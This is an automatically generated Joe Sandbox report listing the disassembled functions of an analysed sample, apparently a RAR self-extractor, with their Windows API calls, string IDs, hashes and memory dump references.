    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: 2e4f8edb58c82f6cffa5f11aaae7d31c113bf91ac4a46b307470d751eff2506c
    • Instruction ID: 4569d4c7ac26d901d343bd08d5ddde0b58afd2f3bc1774e6ac2af3b527138835
    • Opcode Fuzzy Hash: 2e4f8edb58c82f6cffa5f11aaae7d31c113bf91ac4a46b307470d751eff2506c
    • Instruction Fuzzy Hash: D83105B1944248AEEFA0EB649C06FFE7BA9BF45714F008035F548E6192DB788D48CB65
    Function 0005BDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005BE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005BE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005BE82
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: 6415ce3fb8f3bd38826680655495f36a8f1e46af727c0082dfe546665623933b
    • Instruction ID: 59cc5ab435943b885d36bd4ea7d82a2c31e110c97aa9d45dfe72ede6a91e6db7
    • Opcode Fuzzy Hash: 6415ce3fb8f3bd38826680655495f36a8f1e46af727c0082dfe546665623933b
    • Instruction Fuzzy Hash: B811E932600A11BFE6219F68DC47FFB77A9FB4B702F080010FB40AB0A5C766AD169765
    Function 0004EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
    • __fprintf_l.LIBCMT ref: 0004EC74
    • _strncpy.LIBCMT ref: 0004ECBA
      • Part of subcall function 000530E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00083070,00000200,0004EC48,00000000,?,00000050,00083070), ref: 00053102
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 8c35613135b6be00088328436bdfbd7e7e4ad7315ecec7d7fb86e364f6f1435d
    • Instruction ID: 5b24846763fbaf9273a65b2941f240a8ba3837325516342429f9b4bf5bb6a5a6
    • Opcode Fuzzy Hash: 8c35613135b6be00088328436bdfbd7e7e4ad7315ecec7d7fb86e364f6f1435d
    • Instruction Fuzzy Hash: 552193B2940248EEEB20DFA4CD86FEF3BE8BF04700F140532FA159A192E771D6458B55
    Function 0005215F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 0005219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 000521A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 000521B8
    Strings
    • Thread pool initialization failed., xrefs: 000521D0
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: 43d17ef71e58f26577c0f710d0aa5af9a73d28500986c22e180bcd3b44427165
    • Instruction ID: 55545158077b4ecd9540cf7a140b3d7b10f6c57ea950eaf5dfb5a9ac34a8db73
    • Opcode Fuzzy Hash: 43d17ef71e58f26577c0f710d0aa5af9a73d28500986c22e180bcd3b44427165
    • Instruction Fuzzy Hash: 9B11C1B1A04B08AFD3215F7A9C849A7FBDCFF65345F14482EFACAC2200D77459808B68
    Function 0005C450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005C49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0005C4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005C4E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: 61f43a10888b4a71ecacc955ffb8dac9026e77c12fc5bb0ec59aad2c6bd0ae51
    • Instruction ID: 7fb19e6eb4def7f67488340681d01780e0668c5dbc5c92b242ec571ef0ec5334
    • Opcode Fuzzy Hash: 61f43a10888b4a71ecacc955ffb8dac9026e77c12fc5bb0ec59aad2c6bd0ae51
    • Instruction Fuzzy Hash: 5511C472A402287EFB305A649D59FFB3B6CEB0A756F004020FF05F6080C2799D0A9AA5
    Function 0005EE1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 91af0d0e437886bb24eef62e6bc70c64b2848b6762c562533999052b54c5e954
    • Instruction ID: e6f2eb220fac1032052989fa3fb4f33b05c8fa7d1dccba7a09d0fd8d03c0f53f
    • Opcode Fuzzy Hash: 91af0d0e437886bb24eef62e6bc70c64b2848b6762c562533999052b54c5e954
    • Instruction Fuzzy Hash: 5E01D871614788AFFB154F24FC49A5B3BA4FB47756B000026FD8683170D3798D54DBA1
    Function 000412F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0004F608: _swprintf.LIBCMT ref: 0004F62E
      • Part of subcall function 0004F608: _strlen.LIBCMT ref: 0004F64F
      • Part of subcall function 0004F608: SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F6AF
      • Part of subcall function 0004F608: GetWindowRect.USER32(?,?), ref: 0004F6E9
      • Part of subcall function 0004F608: GetClientRect.USER32(?,?), ref: 0004F6F5
    • GetParent.USER32(?), ref: 0004132A
    • GetDlgItem.USER32(00000000,00003021), ref: 0004133A
    • SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    • Opcode ID: d267aae433783dba3cdc07914323fef2d28017bd41fab45dc34f2351782e823e
    • Instruction ID: 366901eac105a37c884b90643e28d9d3e985f8a4df1366a8569ab8bbbeac88bf
    • Opcode Fuzzy Hash: d267aae433783dba3cdc07914323fef2d28017bd41fab45dc34f2351782e823e
    • Instruction Fuzzy Hash: 01F04FB0140A48BBDF655F60CC09BF93BD9BB25786F048134FD88548A2CB79CAD4EB18
    Function 00044957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 0004495C
      • Part of subcall function 0005FD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0005FD19
      • Part of subcall function 0005FD0D: ___delayLoadHelper2@8.DELAYIMP ref: 0005FD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 00044967
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    • Opcode ID: f3084f9ebbcbce0c5c34d0d50dc1657d026b3654658b522f592a285a741fc644
    • Instruction ID: 2802623d0a3420345630d43bfeecc586dffd823ea4bb69e70d044e8139f3dde7
    • Opcode Fuzzy Hash: f3084f9ebbcbce0c5c34d0d50dc1657d026b3654658b522f592a285a741fc644
    • Instruction Fuzzy Hash: 2DF0A7712003447B4624AF59FC4598BB3EDEF85B517104526FA45D7606DBB0FD0487BA
    Function 0005AC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
    Download Yara Rule
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 0005AC4B
    • RegisterClassExW.USER32(00000030), ref: 0005AC6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    • Opcode ID: f593cde3f116ce1af0ec13e33c3a767cab25d55a09091f2350b2d3b71625d20e
    • Instruction ID: 2df145e7dbdd7061cb724646afc8a5e9f4325d200b52d2cbf4b2adfd1f63fe01
    • Opcode Fuzzy Hash: f593cde3f116ce1af0ec13e33c3a767cab25d55a09091f2350b2d3b71625d20e
    • Instruction Fuzzy Hash: 65F0C4B1D11619ABDB009F99D984ADEFBB8FB08355F50402EE505B7240D7B85A048FE4
    Function 0006ABCA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction ID: a1b690aa6d24239330cb33d5a723d3914795c7e9dc562f48d3fe418e2f64100c
    • Opcode Fuzzy Hash: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction Fuzzy Hash: 7EA16A71B007869FEB21EF18C8917AEBBE6EF52310F14416DE596AB242C6398D41CF52
    Function 0004B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00048D5C,?,?,?), ref: 0004B7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00048D5C,?,?), ref: 0004B837
    • SetFileTime.KERNEL32(?,00048AEC,?,00000000,?,00000800,?,00048D5C,?,?,?,?,?,?,?,?), ref: 0004B8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,00048D5C,?,?,?,?,?,?,?,?,?,?), ref: 0004B8BF
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: ce722a0d1b88308c3c82ee820a4eed8ba9e396613fc0daf39807d8c895159b4f
    • Instruction ID: c0f333d50ae430943df752db65eeb3246c757b52c91ee8ad2446c5332cd5b1a3
    • Opcode Fuzzy Hash: ce722a0d1b88308c3c82ee820a4eed8ba9e396613fc0daf39807d8c895159b4f
    • Instruction Fuzzy Hash: 6941CCB0288381AAE721DA24DC55BEFBBE8AF85300F04092DF5D193181DB68DA48DB56
    Function 000410E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    • Opcode ID: cf606aee724ac4be8c691d7c8952ff9475fd4d1a932d33688dcfd2120e418a8b
    • Instruction ID: 9fddcafbe8ca950de285659e1ece751d01e21fdf3defc2711f7efaaa8058f567
    • Opcode Fuzzy Hash: cf606aee724ac4be8c691d7c8952ff9475fd4d1a932d33688dcfd2120e418a8b
    • Instruction Fuzzy Hash: BA41C571900A29ABDB519F688D09AEF7BB8EF05311F000029FD45F7245EB34AD898BE4
    Function 0004851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00048532
    • _wcslen.LIBCMT ref: 00048558
    • _wcslen.LIBCMT ref: 000485EF
    • _wcslen.LIBCMT ref: 00048657
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
      • Part of subcall function 0004B41F: RemoveDirectoryW.KERNEL32(?,?,?,00048649,?), ref: 0004B430
      • Part of subcall function 0004B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00048649,?), ref: 0004B45E
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    • Opcode ID: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction ID: 66f5ecc0dfa61552cc4015a3681357cfc440bebd1aa8c8aa0efd061356cca617
    • Opcode Fuzzy Hash: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction Fuzzy Hash: 6131C6F1800658AACF61AF648C45BEE33A5AF44380F058C76F959A7146EF70DE848B98
    Function 0006DB38 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0006A861,?,00000000,?,00000001,?,?,00000001,0006A861,?), ref: 0006DB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006DC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000680A1,?), ref: 0006DC20
    • __freea.LIBCMT ref: 0006DC29
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: 1c72a7063cc23dd4e140e20b949aa66d7b8461121b8a1c84bf3e0e0a0a4d9ab6
    • Instruction ID: fd51a97005c91b7cb24ecb253cf15a9cdaf3243a415f12775ee7d3753a485e5f
    • Opcode Fuzzy Hash: 1c72a7063cc23dd4e140e20b949aa66d7b8461121b8a1c84bf3e0e0a0a4d9ab6
    • Instruction Fuzzy Hash: 53319C72E0021AABDF259F64DC45EEE7BA6EF00720F054669FC04DA151EB39DD90CBA0
    Function 0005B663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • GetDC.USER32(00000000), ref: 0005B666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005B675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005B683
    • ReleaseDC.USER32(00000000,00000000), ref: 0005B691
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    • Opcode ID: 77b2a7f9758d7019b8c637a94e77276dcb5803e76c1c345ffc23715d1046c317
    • Instruction ID: 03564d641cd9e7d8a043fb57cdaf972e15d7fe6325a95654f1c027984b7f72dd
    • Opcode Fuzzy Hash: 77b2a7f9758d7019b8c637a94e77276dcb5803e76c1c345ffc23715d1046c317
    • Instruction Fuzzy Hash: 1BE0EC31A85E60A7F7601B60AC1DBAB3F54FB17713F040006FA05965D0CBB844448FD1
    Function 0006C368 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 0006C4D4
      • Part of subcall function 000651D6: IsProcessorFeaturePresent.KERNEL32(00000017,000651A8,00000050,00074ADC,?,0004EA30,00000004,00083070,?,?,000651B5,00000000,00000000,00000000,00000000,00000000), ref: 000651D8
      • Part of subcall function 000651D6: GetCurrentProcess.KERNEL32(C0000417,00074ADC,00000050,00083070), ref: 000651FA
      • Part of subcall function 000651D6: TerminateProcess.KERNEL32(00000000), ref: 00065201
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
